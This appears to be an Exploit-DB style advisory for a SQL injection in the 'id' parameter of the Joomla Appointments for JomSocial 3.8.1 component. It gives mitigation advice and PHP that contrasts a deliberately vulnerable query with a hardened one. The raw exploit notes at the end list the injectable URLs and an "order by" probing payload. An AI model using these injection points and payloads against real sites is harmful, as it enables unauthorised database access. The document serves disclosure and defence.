Vendor: Joomla! Component Appointments for JomSocial
By: Ihsan Sencan
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Joomla! Component Appointments for JomSocial
Affected Version From: 3.8.1
Affected Version To: 3.8.1
Patch Exists: NO
Related CWE: N/A
CPE: a:cmsplugin:joomla!_component_appointments_for_jomsocial
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component Appointments for JomSocial v3.8.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Appointments for JomSocial v3.8.1: the 'id' parameter of the 'viewappointment' and 'edit' views is passed into a SQL query without validation, so an authenticated user with an ordinary account can supply crafted SQL through it. An attacker can use this to read sensitive information from the site's database.

Mitigation:

Validate the 'id' parameter as an integer and never concatenate raw request values into SQL statements; use the database layer's query builder or parameterized queries instead. No vendor patch exists for this version.
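The following is an added example, not code from the component or from the advisory author, showing the vulnerable pattern the advisory describes next to a hardened version written against Joomla 3's database and input APIs. The table name '#__appointments', its column names and the ownership check are assumptions for illustration.

```php
<?php
// Added example (not the component's own code): vulnerable lookup beside a
// hardened one. Table/column names below are assumed for illustration.
defined('_JEXEC') or die;

// VULNERABLE: the raw 'id' query-string value is spliced into the SQL text,
// so an input such as "1 order by 10-- -" reaches the database unchanged.
function loadAppointmentVulnerable()
{
    $db = JFactory::getDbo();
    $id = JFactory::getApplication()->input->get('id', '', 'raw'); // unfiltered
    $db->setQuery("SELECT * FROM #__appointments WHERE id = " . $id);

    return $db->loadObject();
}

// HARDENED: the parameter is read as an integer, rejected unless it is a
// positive id, and the statement is assembled with the query builder so no
// untrusted string is ever concatenated into SQL. The ownership clause also
// keeps a regular user from reading other users' appointments by guessing ids.
function loadAppointmentHardened()
{
    $app = JFactory::getApplication();
    $db  = JFactory::getDbo();

    // getInt() applies the INT filter: anything non-numeric becomes 0.
    $id = $app->input->getInt('id', 0);
    if ($id <= 0) {
        throw new InvalidArgumentException('Invalid appointment id', 400);
    }

    // Assumed columns: id, user_id, title, start_time.
    $query = $db->getQuery(true)
        ->select($db->quoteName(array('id', 'user_id', 'title', 'start_time')))
        ->from($db->quoteName('#__appointments'))
        ->where($db->quoteName('id') . ' = ' . (int) $id)
        ->where($db->quoteName('user_id') . ' = ' . (int) JFactory::getUser()->id);

    $db->setQuery($query);

    return $db->loadObject();
}
```

The integer cast alone closes the injection; the additional `user_id` clause addresses the separate access-control question of whether a logged-in user should be able to open any appointment by number, which is worth checking in the same code path while it is being fixed.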
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
# Google Dork: N/A
# Date: 25.02.2017
# Vendor Homepage: https://www.cmsplugin.com/
# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
# Version: 3.8.1 
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
# '+order+by+10-- -
# Etc...
# # # # #